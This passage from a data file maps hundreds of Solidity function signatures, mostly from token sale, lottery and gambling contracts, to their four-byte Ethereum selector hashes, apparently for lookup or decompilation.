"getMaxProfit(uint256)": "0xb3472edb", "_finishBet(address)": "0xe6acca00", "RequestBankrollPayment(address,uint256,uint256)": "0x6c7ca99f", "setupBankrollInterface(address)": "0xcd2ab49e", "BirCoin()": "0x79530087", "GEM()": "0x4dc65411", "SEBCToken()": "0xba119e5a", "zsjz(uint256,string,string)": "0x8c217d06", "MoniCoin()": "0x023569aa", "newLockTimestamp(uint256)": "0xb0544308", "newTokenUnlockPercent(uint256)": "0xea2c4357", "newMinimalEthers(uint256)": "0x27a6a7de", "lockUp(bool)": "0xd6a39db0", "newWithdraWallet(address)": "0x43ea8d7b", "newDepositWallet(address)": "0x33848008", "newWithdrawCommission(uint256)": "0xc20c1d9b", "newInvestCommission(uint256)": "0x1db625c3", "newDepositCommission(uint256)": "0xf19ac52d", "deleteInvestorTokens(address[],uint256[])": "0xe87f41bb", "_lockPaymentTokens(address,uint256,uint256)": "0xce1619f8", "balanceOfUnlockTokens(address)": "0x60e708b3", "getPurchases(address,uint256)": "0xd56a62cf", "PUCOINToken(address,uint256)": "0xe53ae072", "LOFO()": "0xbba46031", "BitcoinDiamond()": "0xb63cf3ca", "EIP20()": "0x1744215a", "undoPending(address)": "0xe1b3f338", "pending(address)": "0x5eebea20", "transferByRelatedToken(address,address,uint256)": "0xa7807b84", "setShareTokenAddress(address,address)": "0xd00ef880", "getShareTokenAddress()": "0x10680b84", "setFungibleTokenAddress(address,address)": "0xb399a9f8", "getFungibleTokenAddress()": "0x9c9a2365", "IWasFirstServiceToken()": "0xc50f8274", "NotaryChain(uint256)": "0x6288a63c", "getjackpot()": "0x5b752d5d", "getamountvotes()": "0xa6593562", "getroundendtime()": "0xa4689d48", "selectplayer()": "0x73ef6357", "getpotReward()": "0x3f36d33d", "withdrawbymanager()": "0xf261a8c0", "validation_inviter(address)": "0xf3e1efbf", "registerNameXNAME(string,address)": "0x7bc89ae7", "endround()": "0x4026eb92", "allot(uint256)": "0xaa1cdce8", "calculateselfOdd()": "0x127f3374", "voting(string)": "0xe3393a6d", "airdrppReward()": "0x3a5d73d1", "calculatVotePrice()": "0x0324d0d9", "raisevote()": "0xac9d7e0a", "getcoinsvotes(string)": "0x9ef40238", "getcvotesid(string)": "0x00badc85", "getcoinSortinglength()": "0xde9652b1", "setcoinfee(uint256)": "0x13c9134b", "SortingCoins()": "0xb60f54f4", "tovote(string,uint256,uint256)": "0x077f1008", "addcoin(string,string)": "0x4c5b632a", "ZLHToken()": "0xf976c371", "UniCoin(uint256,string,string)": "0x6130ced2", "TicTokenERC20()": "0x39b26735", "addTokenData(uint256,string,string)": "0x1244861e", "changeBalancesDB(address)": "0x3e3cba8f", "getOperator(address,address)": "0x4cc60757", "getModule(address)": "0xb5de8d4c", "decTotalSupply(uint256)": "0x35e09095", "incTotalSupply(uint256)": "0xecfc5964", "decApprove(address,address,uint256)": "0xfcfdf7c5", "setApprove(address,address,uint256)": "0x91ef14b4", "multiPartySend(address[],uint256[])": "0x1075153f", "multiPartySend(address[],uint256[],bytes)": "0xddb863be", "multiOperatorSend(address,address[],uint256[],bytes,bytes)": "0x6379a852", "sellerIdOf(address)": "0x86813c53", "getSales()": "0x0d83304c", "unlocked()": "0x6a5e2650", "Fomo5d()": "0x79c74a38", "releaseReserveTokens()": "0x89cf5604", "calcAirDropAmount(uint256)": "0x1c16c3ad", "calcTrackerCount(uint256)": "0xa8af74f1", "calcCanAcceptAmount(address,bool,uint256)": "0x1a534fd1", "calcAndSetPlayerTotalCanAccept(address,uint256)": "0xadc29028", "matching()": "0xae5ec2e9", "packageOfferInfo(address,uint256)": "0xa141ce6a", "getCanAcceptAmount(address)": "0xf9639d80", "acceptHelp(uint256)": "0xf70794ea", "offerHelpUsingBalance(address,address,uint256)": "0x128e1329", "offerHelp(address,address)": "0x9af1ef32", "setXToken(address)": "0x81a2568d", "transFee()": "0x1e25dc54", "SETC(uint256,string,string)": "0x790be9b5", "releaseLockedTokensFor(address)": "0xfb32ade3", "releaseLockedTokens()": "0xfbd42e0f", "createTokenVault(uint256)": "0x428a2ece", "createLockingTokenVaults()": "0x1ca9ad47", "TokenLiquidityPlatform()": "0xa72ec7a0", "lockTopLevelDomainOwnershipTransfers()": "0x38a211b7", "transferTopLevelDomainOwnership(bytes32,address)": "0xcbb6e5c9", "applyForToken()": "0xf578fd7c", "go(uint8)": "0xe07f3dd6", "giveTurnToPlay(address)": "0x588e6b83", "ethersplay(uint8)": "0xdbfccd16", "verifySignature(address,uint256,bytes32)": "0x9a38aeb1", "verifyDeployment(address,bytes32)": "0x90b2ae49", "confirmDeployment(uint256,address,bytes32)": "0x1937714b", "reserveDeployment(address,bytes32,address,uint256,uint8,bytes32,bytes32)": "0x7ea5e7d3", "DeployRelay()": "0xc540f903", "forward(address,bytes,uint256,bool)": "0xdffdc75d", "setRecoveryContract(address)": "0x6029d66f", "getUserProxy()": "0x89f4fd57", "User(address,address)": "0xcf1b45c3", "TicTacToeLockedState(address,address,address,address,address)": "0x50e27f2d", "testInitialBalanceWithNew()": "0x123180a2", "calcAllowedWeisToInvest(uint256)": "0x79515566", "calcReservedTokens(uint256,uint256)": "0xca9a06df", "calcPriceFromFactor(uint256)": "0xbf4e9615", "finalizeAuction()": "0xf77282ab", "calcStopPriceFactor()": "0xa9adaecd", "calcTokenPriceFactor()": "0x309c315d", "exchange(address,uint128)": "0xe864f2b6", "claim(address,uint128)": "0xc13f4af7", "bid(address,uint128)": "0x156a2f36", "setPriceEther(uint256)": "0x2af5e6b2", "setClaimingStart(uint256)": "0x0e414500", "setAuctionStart(uint256)": "0x181f4456", "setup(uint256,uint256,uint256,uint256,uint256,uint8,uint256,uint256,uint256,uint256)": "0xf7b14066", "PapyrusSalePhase1(address,address)": "0xabb524a4", "getContractOrNormal(address)": "0x7ef224ee", "testContractOrNormal(address)": "0xef0ad164", "ContractDetector()": "0x73124ee9", "Grant(address)": "0x14a2d99f", "getHashRightPad()": "0x8c261e2c", "getHashLeftPad()": "0xceb41385", "setMockedNow(uint256)": "0x911058df", "ProfitSharingMock(address)": "0x24f12f1e", "reclaimTokens()": "0x3c54caa5", "revokeAllocation(address)": "0xe70b11df", "setRevokeAddress(address)": "0x55575ddb", "isRevoke(address,address)": "0xcf879e83", "refundPlayers(uint256)": "0x5922b831", "deductFee()": "0xb4d85686", "checkAndCloseRound(bool)": "0x1b203b9d", "revealBet(address,string)": "0x345942c8", "placeBet(uint256,string)": "0x5e8af735", "verifyBet(uint256,uint256)": "0x4f3655a8", "startNewRound()": "0xbd85948c", "setNextRoundFee(uint32)": "0xf7f7915d", "setNextRoundRequiredBetAmount(uint256)": "0x8cd5dce3", "setNextRoundLength(uint256)": "0xf0932bd7", "getBet(uint256,address)": "0xe0950ddf", "getRoundInfo(uint256)": "0x88c3ffb0", "getGameInfo()": "0x1746bd1b", "getOraclizePrice(string)": "0x8064696b", "getFeeAmount(uint256)": "0x9704122c", "getWinnablePot(uint256)": "0x0ab0c6c8", "getTotalPot(uint256)": "0xed885897", "getRequiredBetAmount(uint256)": "0x623d2b62", "latestRoundId()": "0x11a8f413", "getOraclizeCbAddress()": "0xa880531f", "NumberGame()": "0xb76c3764", "round(uint256)": "0x34d5f37b", "getFinalPaymentAmount()": "0x4f3ded8a", "getFirstPaymentAmount()": "0xe0f8c670", "calculateRAUS()": "0x4132bae8", "calculateBTS()": "0x7145644c", "updateRausPoint(int256,uint16,int256,uint16)": "0x9eb360cc", "updateBtsPoint(int256,uint16,int256,uint16)": "0x7fe60640", "setGVE(uint32,uint32,uint32,uint32,uint32,uint32,uint32,uint32,uint32)": "0xf77014da", "addLacks(uint16[],int64[],uint16[],int256,int64[],int256,int64[],uint8[])": "0xf6d4a265", "setInspectorId(address)": "0x021c7bd7", "Request(uint16[],string,address,uint32[],uint256)": "0xd751b8de", "setModified()": "0xaf7fdd76", "setCreated()": "0x90e10250", "get(bytes12)": "0x02e0c14a", "has(bytes12)": "0x0fba34a4", "list_files()": "0xcd402189", "parse(bytes)": "0xfab4087a", "test_oneValidEqBytesUint(int256)": "0x27c39749", "cancelOrderInternal(uint80,bool,bool)": "0xd655c786", "cancelOrderByAdmin(uint80,bool)": "0x9d0f8763", "cancelOrder(uint80,bool)": "0xe35ca326", "GxCancelOrders(address)": "0x4133e7a1", "Transaction2()": "0xea1e4c2d", "rejectBid(address,uint256)": "0x809d7902", "closeBid(address,uint256)": "0xe554a5ff", "createBid(bytes32,address,address,address,uint256,uint256,uint256)": "0x7cf6be2c", "sendAmount(address,uint256)": "0x5d461de5", "getBidsNum(address)": "0xf913a879", "getBidIndex(address,bytes32)": "0x05860b6f", "write(string)": "0xebaac771", "getAllSSP()": "0xbee03488", "getSSP(address)": "0xd2cbcea6", "updatePublisherFee(address,uint16,address)": "0x2503dce8", "SendResult(uint64,bytes32,bytes32)": "0xfa1db1e7", "Register(bytes4,bytes32,bytes32[8])": "0x1313f631", "IdClaveChain(address)": "0xd744f330", "setMockedBlockTime(uint32)": "0x00f62717", "OpenLongevityPresale()": "0xf501af70", "PresaleToken()": "0xdad24541", "randomNumberGen(uint256,uint256)": "0xa2564f7c", "determineLuckyVoters()": "0xcf756935", "requalify(address)": "0xe8d663a4", "disqualify(address)": "0xef5a625b", "getCandidatePosition(address,uint256)": "0x9717d76f", "Contest()": "0xf1a5158b", "startingPriceOf(uint256)": "0xaf7520b9", "enableERC721()": "0x71dc761e", "CryptoSanguoToken()": "0x0df22268", "saleOverReachMaxETH()": "0x24863354", "saleOverInTime()": "0x1e982b40", "saleOver()": "0x23b80995", "generateTokenAmount(uint256)": "0x139c7048", "BitnanRewardToken(address)": "0x8bbbc7a2", "issueLeftToken()": "0x91436eee", "issueToken(address)": "0x89034082", "manual_withdraw()": "0x8f484394", "allowTransfer()": "0x9b08a22f", "setBuyAllowed(bool)": "0x687d5aa9", "setOwnerPrice(uint256)": "0x9dd63c3a", "takeEther()": "0x1565c3c8", "RNDInvestor()": "0x706aba4a", "subZero(uint256,uint256)": "0x26532df8", "blockLeft()": "0x9902ef5b", "setAutoPayFee(bool)": "0xee815eae", "setRtmContract(address)": "0x62ebcdcf", "setInvContract(address)": "0x2867586e", "getLastWinner()": "0xf88649a1", "getTicketsAtAdress(address,address)": "0x4c439436", "getTicketsCount(address)": "0x54659685", "getTicketOwner(uint256)": "0xad093409", "prizeFund()": "0xf3ac3df5", "jackPotC()": "0xafda2dac", "jackPotB()": "0x00541756", "jackPotA()": "0x392ee145", "getWinningNumber(uint256)": "0x74ecf4b5", "sendEth(address,uint256)": "0x49dcbc5e", "_payfee()": "0x3c993482", "payfee()": "0xd5e3fbb2", "startNewDraw(uint256)": "0x721fefac", "EndLottery()": "0xb04a3f1c", "manager_withdraw()": "0xb5402ec3", "SoundbitToken()": "0x69e82500", "SLCAdvancedToken(uint256,string,string)": "0xd769ae1b", "whitelistAddresses(address[])": "0x2bf04304", "changeTokenReward(address)": "0x36044ecc", "startSale()": "0xb66a0e5d", "toggleActive(bool)": "0xfbe0508c", "changeRate(uint256)": "0x74e7493b", "KeplerCoin()": "0xcbe3be97", "buyPresale()": "0x9fcdec61", "SnoqualmieCoin(uint256,string,string)": "0xf2a724b1", "delegateReferralTokensBulk(address[],uint88[])": "0x74b26fa1", "delegateReferalTokens(address,uint88)": "0xf875c421", "delegateBonusTokens(address,uint88)": "0x11ef8d4b", "delegateTokens(address,uint96)": "0x6af1fdf7", "importTokensFromSourceToken(address)": "0x1f227fc8", "markAsImported(address,address)": "0xb5da2df4", "isImported(address,address)": "0xc829958c", "setPaymentGatewayList(address)": "0x3c8a321c", "setStagesManager(address)": "0x159218d2", "disableTransferWhitelist()": "0x6766fafe", "setTransferWhitelist(address)": "0xda08c5a3", "UNITv2(address)": "0x22555bea", "isInList(address)": "0xfa33bcf3", "getAll()": "0x53ed5143", "removeBulk(address[])": "0x74fd6176", "addBulk(address[])": "0xfd413596", "getReferralPool()": "0x8250ea7d", "getBonusPool()": "0xd6aab015", "delegateFromReferral(uint88)": "0x77a28225", "delegateFromBonus(uint88)": "0x4db3eef8", "delegateFromPool(uint96)": "0x8b4e79c2", "calculateBonus(uint96)": "0x13e33fb6", "isCanList()": "0x23c731f5", "isTimeout()": "0x32c26957", "isFreezeTimeout()": "0x73086e58", "getPool()": "0x026b1d5f", "isDebug()": "0xf21aefd2", "closeStage()": "0xf96d1c94", "calculateBonus(uint256)": "0x6081f5cb", "calculateReferralBonus(uint256,uint256)": "0xc762d3ea", "getAvailableCoinsForCurrentStage()": "0xb2df8bad", "getTotalCoinsAvailable()": "0x0e30cda7", "_proceedStage()": "0x36a39882", "_setupStages()": "0xfe4d2a02", "getTeamWallets()": "0x99d1e755", "prealocateCoins()": "0x13622274", "UnilotToken()": "0x9d1080c5", "setUsdPerEthRate(uint256)": "0x80529172", "getMyRefund()": "0x5546e1ab", "issueTokensInternal(address,uint256)": "0x78b8a6c2", "issueTokensExternal(address,uint256)": "0xda942ab3", "issueTokensFromOtherCurrency(address,uint256)": "0x71ec98dd", "getMntTokensPerEth(uint256)": "0xe74ba7b3", "getTotalCollectedWei()": "0xb7813355", "getBlockLength()": "0xdce57755", "getMntTokenBalance(address)": "0xbfd9726d", "getTotalIcoTokens()": "0xffd4e0e2", "getTokensIcoSold()": "0x781a4a74", "maxStage3AllocationPerInvestor()": "0x350845f5", "weiMinimumGoal()": "0x82768708", "standardFee()": "0xf8140a7e", "_salesprice()": "0xac355ed3", "depositsTillNow()": "0x2bc6597c", "transferMethodId()": "0x1e1a48cf", "ALLOC_COMMUNITY()": "0xeeab57bf", "multisignWallet()": "0x710edb10", "ProjectFund()": "0x43d47f82", "PreICOPart()": "0x78adf55e", "DISCOUNT_STAGE_ONE()": "0xca63f057", "highestEditionNumber()": "0xabf3260f", "totalFci()": "0x8e6954de", "gasLimitInWei()": "0xfebb1315", "serverPortUpdate()": "0xd1be7cc4", "withdrawPendingAmounts()": "0x6dcd6eb9", "forceOffsetBasicFeeRate()": "0xce9e673b", "addressSalesSupply()": "0x689ffd82", "CONTRIBUTORS_SHARE()": "0x19362921", "TEST_CONTRIBUTION()": "0x24425cbf", "openRefund()": "0x392aa4d5", "const_contract_eth_value()": "0x56813535", "totalEarlyPurchaseRaised()": "0x8710296f", "handbreak()": "0x3471aef0", "unlockTime()": "0x251c1aa3", "MAX_AUDIT_TIME()": "0xdc1abb6e", "perTransactionRate()": "0xefa6fd63", "get_hedge()": "0x68802712", "TVThreshold()": "0xf92b9dc7", "spawnNewZeroCard()": "0x0a075a32", "ether_per_token()": "0x8def14f3", "tokenPorter()": "0x4892f0af", "reward9()": "0x1ea6af82", "tokensBack()": "0x6d0ca12a", "maxHEXCap()": "0x77d9d1fb", "TOKEN_STANDARD_ERC223()": "0x2f7359a3", "crowdSaleMinAmount()": "0x90bf348f", "maxPriceInWeiFromUser()": "0xb614213d", "crowdSaleStart()": "0x51613683", "getScope()": "0x951cfa47", "weekFourthRate()": "0xee0cb64c", "gcExchangeRate()": "0x0a979511", "leastSwap()": "0xebb0a856", "teamlock()": "0x1ac8a9b2", "icoMinInvest()": "0xf42b9999", "Tier_Basic()": "0xb79a6231", "TOURNAMENT_BATTLE()": "0x6ed84231", "initialDistributionDone()": "0x0535ec77", "fileLink()": "0xe9e972d9", "crowdsaleGoalReached()": "0x50d4a2b9", "initICO()": "0x126b12e7", "ethtosend()": "0x1531dfdb", "btcs()": "0xbb632244", "failedVotingCount()": "0x04b6ae61", "policyTokenBalanceFromEther()": "0x5a5638dc", "selflleryManagerWallet()": "0xe7d47c2e", "tokenAmountRasied()": "0x420e7ea6", "finalReserveTimeLock()": "0xe0fdf336", "rewardDistributionStarted()": "0x037f9cf0", "leftoverTokensBuffer()": "0x9c0e7d66", "priceIsFrozen()": "0x9e65fab0", "TIER_2_CAP()": "0x301dd027", "freeAnimalsLimit()": "0x9d36c500", "MAX_CANVAS_NAME_LENGTH()": "0x489e5656", "PRESALE_START_WEEK2()": "0x21e5d0e4", "releasedForTransfer()": "0xe69d09cf", "RCN()": "0x63732cf0", "rate3()": "0xaff1f15f", "bonusRatePeriodOne()": "0x53537303", "preSalePrice()": "0xe757c17d", "releaseRestBalance()": "0x89952097", "feeAddr()": "0x39e7fddc", "description1()": "0xf4eb6889", "COMMUNITY_RESERVE()": "0x11c94362", "backingToken()": "0x47e621b7", "roundID()": "0x14f8b424", "fundingWalletAddress()": "0x9ce21f3c", "fundTotalSupply()": "0x373a7c01", "btcOracle()": "0x22a15848", "icoPhase2TimeBonusInPercentage()": "0xd81c2232", "coef()": "0x3afd4b5e", "CAP_USD()": "0x4d0ad141", "mainMaxContribution()": "0xc7b11fca", "minLimit()": "0x1fd8088d", "USDTUBESupply()": "0xfd99c012", "logoPng()": "0x4d4eeaa8", "tokensPreSale()": "0xecdfca06", "getTodayLotteryNumber()": "0x7565ef66", "preSaleDeadline()": "0xf9327b9f", "tokenRemainPublicSale()": "0xad7a14e1", "bountyTokensCreated()": "0xda228f9c", "priceUnits()": "0x06279d72", "tokenReservationAllocated()": "0xdd9180ea", "minPayment()": "0x2e276499", "_fundowner()": "0x6bf341e7", "curPrice()": "0x93a91682", "SPIDER_BASE_REQ()": "0x090b8d18", "totalEDUSAllocated()": "0x4c136ea8", "totalHeldSupply()": "0x8b6c1cfb", "mincap()": "0x4e2b57fe", "flushERC20(address)": "0x477523c2", "flushETH()": "0x69f8ef0c", "modifyMessage(string)": "0xe9024ff5", "AIHToken()": "0xae788913", "CARIToken()": "0x67e4373f", "DTOToken(address)": "0x0c316d6a", "SCNToken(uint256,string,string)": "0xaef8a536", "HGUATToken()": "0x4527b4b6", "refundPlayersInRoom(uint256)": "0x383f61b3", "RuletkaIo()": "0x59ce0a8f", "insetMoney()": "0x57417e78", "getUnlockSdc()": "0xb3fa24ef", "getLockSdc()": "0xfc7d6518", "getAccountOutputSdcslength()": "0x14c15569", "getAccountInputSdcslength()": "0x9a16a7e3", "nowInSeconds()": "0x7995b15b", "outSdcForUser(uint256)": "0xecc2c47c", "inSdcForAdmin(address,address,uint256,uint256)": "0x7767ecc3", "ECRCTOKEN()": "0x91421cf6", "Vboom()": "0x14036f62", "BitcoinDeuce(string,string,uint8,uint256)": "0x05e992ff", "uint256Tostr(uint256)": "0xb87760ad", "setTokenHash(uint256,uint256)": "0x5418ecdd", "setTokenURI(string,uint256)": "0x09a3beef", "mintManyTo(address,string,uint256[],uint256[])": "0xf6e72981", "mintTo(address,string,uint256,uint256)": "0xe7095e97", "SfomoToken(uint256,string,string)": "0x4221115c", "getFeeSharingWallets()": "0x88046818", "registerWalletForFeeSharing(address)": "0x688057fc", "setFeeSharingValue(uint256)": "0x9e05de62", "TLSC()": "0x002338ef", "approveExchange(address,address)": "0x588b5c7b", "ARCONA()": "0x995e599d", "transferUnsoldTokens(address)": "0x9d0880a3", "ifFreeze(address)": "0x63c454ca", "XMLYToken()": "0xd8d5740c", "setContributionInWei(uint256)": "0x892e3f98", "changeAllowance(address,address,uint256)": "0x87c8ab7a", "returnAmountPlusInterest(uint256)": "0xd89edecf", "getLoansCount()": "0x0c97200a", "returnMessage(uint256)": "0xe9e2c786", "returnRequestCancel(uint256)": "0x81193a30", "returnBorrowerPaidLate(uint256)": "0xff8cffc1", "returnInterest(uint256)": "0xf9662c8f", "returnLoanLength(uint256)": "0xc9270652", "returnAmountPaidBackSoFar(uint256)": "0x17fb44c1", "returnLoanStatus(uint256)": "0xd3d43efa", "returnPaidBackBlock(uint256)": "0xf8eee5d6", "returnAmount(uint256)": "0x030f5702", "returnStartBlock(uint256)": "0x0cd522da", "returnVolAdjuster(uint256)": "0x33decdc6", "returnLender(uint256)": "0x9493242c", "returnBorrower(uint256)": "0xad449198", "payAmountForLoanAtIndex(uint256,uint256)": "0xc98c6e08", "attemptBeginLoanAtIndex(uint256)": "0xd65995ed", "declareDefaultAsBorrower(uint256)": "0x5b454832", "stateBorrowerDefaulted(uint256)": "0x14c0a37a", "cancelActiveLoanAtIndex(uint256)": "0xe6f8298c", "cancelLoanRequestAtIndexByBorrower(uint256)": "0xb686c983", "cancelLoanRequestAtIndexByLender(uint256)": "0x6e6d83d2", "requestLoan(address,address,uint256,uint256,uint256,bool,string)": "0x084ab6f5", "adjustLoanParams(uint256,uint256,uint256)": "0xb0a08873", "loanCompleted(uint256,uint256)": "0x62e26e45", "lendingManager()": "0x9e3b77af", "ElphToken()": "0x461e0be5", "Zmbc()": "0x96246eb8", "changeNameAndSymbol(string,string)": "0x089bb99a", "FortuneGodToken(address)": "0x1a2c4334", "CampingCoin()": "0x78f5e0ec", "MindCoin(uint256,string,string)": "0xa8f92b52", "getOutAmount()": "0xd07adab3", "FinderHyper()": "0x0764a7fa", "transferFrom(address,address,address,address[],uint256)": "0x9d2affd5", "dataMigration(address,address,address[])": "0xca1ea20e", "airDropValues(address,address,address[],uint256[])": "0xafdd4d23", "airDrop_(address,address,address[],uint256)": "0x79fd86cc", "BurnCoinToken()": "0x0123aff4", "UniverseShieldToken(address,address)": "0xc75bc6f8", "transferToContributionPool(uint256)": "0x29f7bd2f", "getContributionPool()": "0xc48eabc0", "setContributionPool(address)": "0xf0c1d1c7", "initWallets(address,address,address,address)": "0x23e5942a", "resumeCrowdSale()": "0x037c983a", "pauseCrowdSale()": "0xbd7d3836", "AIHTeamLockContract()": "0xbca53fa0", "StanleyNickels()": "0x63e0f8c3", "EpietherCrowdsale()": "0xd696888a", "EpietherToken()": "0x2bafc817", "bundleOfOwner(address)": "0x90cf76fa", "getERC721Nfts(uint256,address)": "0x12b3a445", "getERC721Addrs(uint256)": "0x34475d8d", "getNftId(uint256,address,uint256)": "0x619d3063", "getERC721Id(uint256,address)": "0xf8fe63b0", "getAllERC20(uint256)": "0xf6448391", "getERC20Id(uint256,address)": "0xbe410448", "withdrawERC721(uint256,uint256,address,uint256)": "0x1c057493", "withdrawERC20(uint256,uint256,address,uint256)": "0xee59da42", "createBundle()": "0xe2cf8b0d", "Geet()": "0x6416ec30", "HitToken(string,string,uint8,uint256,uint8,uint8,address,address)": "0x9155cc2c", "ACAToken(uint256,address)": "0x6fd9101f", "manualSendTokens(address,address,uint256)": "0xc6ce81f0", "volumeBasedBonus(uint256)": "0xda977038", "timeBasedBonus(uint256)": "0x97aaa73c", "isIco(uint256)": "0x0a1e71de", "changeIcoFinish(uint256)": "0x0008f8df", "acceptSupport()": "0x944126f4", "transferTechSupport(address)": "0x2184fe2c", "MaybePerformWithdraw()": "0xafc6fe2e", "Withdraw(address,uint256)": "0x884edad9", "Fundraiser(address,address)": "0x33791c36", "_calculateUnlockedTokens(uint256,uint256,uint256,uint8,uint256)": "0x58888b40", "withdrawAdvisersTokens(address,uint256)": "0x4a09d3cf", "withdrawCommunityTokens(address,uint256)": "0xf854d74c", "withdrawTeamTokens(address,uint256)": "0x4ad1cbad", "withdrawOverdraftTokens(address,uint256)": "0x96497258", "distributeInvestorsTokens(address,uint256)": "0x5e8f6597", "NexoToken()": "0xe1f0ae1b", "Goldmint(address,address,address,address,address)": "0x608cadb8", "MecStandardToken(uint256,string,uint8,string)": "0xea5c204b", "getInspireTokens(address,address,uint256)": "0x5ed81ebe", "getAirDropTokens()": "0x4644d17e", "inspire(address,uint256)": "0x172c9a0e", "IDAGToken()": "0x31cfcf84", "MYDLToken()": "0xaa84edb8", "LISKClassic()": "0xa9a3cef4", "isClientIdentRejectedOf(address)": "0xc10e9ba0", "collectableTokenOf(address)": "0x0e9e543a", "transferEtherOut(address,uint256)": "0x28dee1d2", "transferTokenOut(address,uint256)": "0x002e0ae7", "collectToken()": "0xcc4cc05f", "setTokenCollectable(bool)": "0x8484ff59", "setClientIdentRejectList(address[],uint8)": "0x3c5e28d6", "recordOffChainContribute(uint256,address,uint256)": "0xe31ff6c2", "contributeByBitcoin(uint256,uint256,address,uint256)": "0x075c18f7", "enableContribution(bool)": "0x8a175ac2", "setNewEnd(uint256)": "0xbc466ab2", "setNewStart(uint256)": "0x568a2c55", "getBasicTokenAmount(uint256)": "0xaf6f37a2", "getReferralBonusAmount(uint256)": "0xb06eedf5", "getVolumeBonusAmount(uint256,uint256)": "0x31839753", "getTimeBonusAmount(uint256)": "0xc524645b", "getVolumeBonusPercent(uint256)": "0xc9ef5569", "getTimeBonusPercent(uint256)": "0x04a2eaa5", "getCurrentSaleDay()": "0xd7109dda", "getCurrentDatetime()": "0xacc7f8a8", "TeuToken()": "0x1d590771", "ThePlat()": "0xed34ca2e", "ACchainToken()": "0x7c34689b", "changeMultiSigWallet(address)": "0x969d5b94", "unpauseCrowdsale()": "0x72d9b86f", "privatePresaleTokenReservation(address,uint256,uint256)": "0x0be5ca05", "PULSCrowdsale()": "0x6b9c6116", "removeStages()": "0x45626ecb", "closeStage(uint256)": "0x8e7558cd", "addStage(uint256,uint256,uint256,uint256)": "0xae101f31", "unlockTokens(address,address)": "0xa9f2db37", "lockTokens(uint256,uint256,bytes32)": "0x08ac782c", "revertReservation(address,address)": "0x29ff7d04", "reserveTokens(address,uint256,uint256,uint256)": "0x57e18886", "sendTokens(address)": "0x837197b2", "getLockedStructPulseLockHash(address,address,uint256)": "0x58fd989b", "getLockedStructTimeToLock(address,address,uint256)": "0xb533ff5f", "getLockedStructStartTime(address,address,uint256)": "0x181f4477", "getLockedStructAmount(address,address,uint256)": "0xbaab89d5", "getAddressLockedLength(address,address)": "0x23d862ed", "collectedEtherFrom(address)": "0xd219f103", "reserveOf(address)": "0x9fa77b20", "PULSToken()": "0x65ccb687", "TOPB()": "0x74d50c1c", "setHelpMeTokenParts(address[])": "0x475c420c", "XWALLET()": "0x2b774d46", "giveDirectoryTokenAllowance(uint256,address,uint256)": "0xf9a191c8", "batchTransferDirectoryToken(uint256,address[],uint256[])": "0x925f2573", "transferDirectoryToken(uint256,address,uint256)": "0x1d365669", "balanceOfDirectoryToken(uint256)": "0x87b547e5", "mintBonus(address)": "0x957b781c", "BTCAUC()": "0x627b3d9a", "liveBetexICO()": "0x3608672c", "allUnsoldTokensAllocated()": "0x4908d1de", "addRefiller(address)": "0x0abe293d", "allocatePreICOTokens()": "0x9d97bcd7", "allocateUnsoldTokens()": "0x78ed8dfd", "scheduleUnsoldAllocation()": "0x34f2d1ec", "BetexICO(uint256,uint256,uint256,address,address,address)": "0x40621412", "transferAllowed(address)": "0x151eeb55", "addHolder(address)": "0xac1e17df", "removeHolder(address)": "0x8dd42808", "preserveHolders(address,address,uint256)": "0xb0bc4d67", "enforceSecondLock(address,address)": "0x3e4a9263", "getHoldersCount()": "0x73889f4a", "BetexToken(uint256,uint256)": "0x7c161409", "HBXToken(address)": "0x69a3a65a", "buyTickets(bytes32)": "0x1a170aa1", "chooseWinner(bytes32)": "0x40e424ee", "getRaffleTimeLeft()": "0xe7638445", "RaffleStrangeLoop(bytes32)": "0x22bfdcbb", "GoingGems(uint256,address)": "0xdd563726", "teamClaim(uint256)": "0xa026da8c", "totalBurnt()": "0x966ff650", "acquireTokens(uint256,uint256,address,uint256)": "0x50b7e942", "accreditInvestor(address,address)": "0x7c05ba7a", "_forwardFunds(address,uint256)": "0x0c8114d3", "_finalizeSale(bool)": "0xd9a4cc33", "_getReleaseDate(uint256)": "0x4a994d22", "_getRefBonus(uint256)": "0x56e721b3", "_allocate(address,uint256,uint256)": "0xae6dca72", "isSaleContract(address)": "0x578bbdc1", "allocatePurchase(address,uint256,uint256)": "0xb9c5be85", "_updateRate(uint256,uint256)": "0x5f6acfe9", "setUpdateDelay(uint256)": "0x09d3cbda", "setCallbackGasLimit(uint256,uint256)": "0xe1b9dc08", "GoyanToken()": "0x140f64b4", "OneKeyToken(uint256,string,string)": "0x4fced032", "Corolexcoin()": "0x594bbe8f", "Census()": "0xcd2f7c1a", "withdrawAll(string,uint256)": "0x1b773df1", "Gralaxious()": "0xdae3f7e2", "point(address)": "0x47e20183", "getAdministrator(address)": "0x0549f150", "replaceAdministrator(address,address)": "0x6b931cad", "setSkcAdderss(address)": "0xb69a8107", "unsetAdministrator(address[])": "0x0bb3a066", "setAdministrator(address[])": "0x56d59777", "updateLedger(uint256,address[],address,uint256[],uint256[])": "0x57f04d2b", "pointToToken(uint256,address,uint256)": "0x04b5b5b6", "tokenToPoint(uint256,address,uint256)": "0xd5cdd2c7", "tokenToPointBySkcContract(uint256,address,uint256)": "0x0bc32ab6", "tokenToPointByMetaMask(uint256,uint256)": "0xe030bbd5", "BJCToken()": "0x0c4641d3", "approveRequest(bytes32,uint256)": "0xb69c2115", "initRequest(uint256[])": "0x9321dc5f", "addLog(string,string,bytes32)": "0x0f73d212", "getPet(address)": "0xeee24570", "setPet(string)": "0xbc78ac81", "WellyPai()": "0x86a9443e", "BlockmoXyz()": "0x2e5d89bd", "Test2Token()": "0xb6215091", "setFoundationInterface(address)": "0x3f109205", "withdrawnow()": "0xf19fb157", "Simple()": "0xfcd936b1", "RealAssetToken()": "0x6728b711", "ASCCToken()": "0x3064448e", "testdigiToken()": "0x8f22d128", "Devcoin()": "0x1cb20fe6", "Africacoin()": "0xc48db366", "TriedToken()": "0x295dad5e", "OtomatizToken()": "0x7172d9f0", "ArrowCOin()": "0x3af9f8ac", "taxEth(uint256,address)": "0xd9573c1a", "mul_float_power(uint256,uint8,uint8,uint8)": "0xe71a402e", "PurchaseTokens(uint256,address)": "0x7f760335", "calDivs(address,uint256)": "0xd75e7afd", "treeBuild(address,address)": "0xf066cb83", "getFeeRate(address)": "0x8198edbf", "setReinvest(bool)": "0xf5d3c79a", "setnewPlayerFee(uint256)": "0x3a7e6854", "setTokenValue(uint256)": "0xa2bf6939", "setFee(uint256,uint8)": "0xc0b84bfe", "setGate(uint256,uint16)": "0x67460d58", "getAdministratorMoney(address)": "0xa9b551d2", "withdrawAdministratorMoney(uint256)": 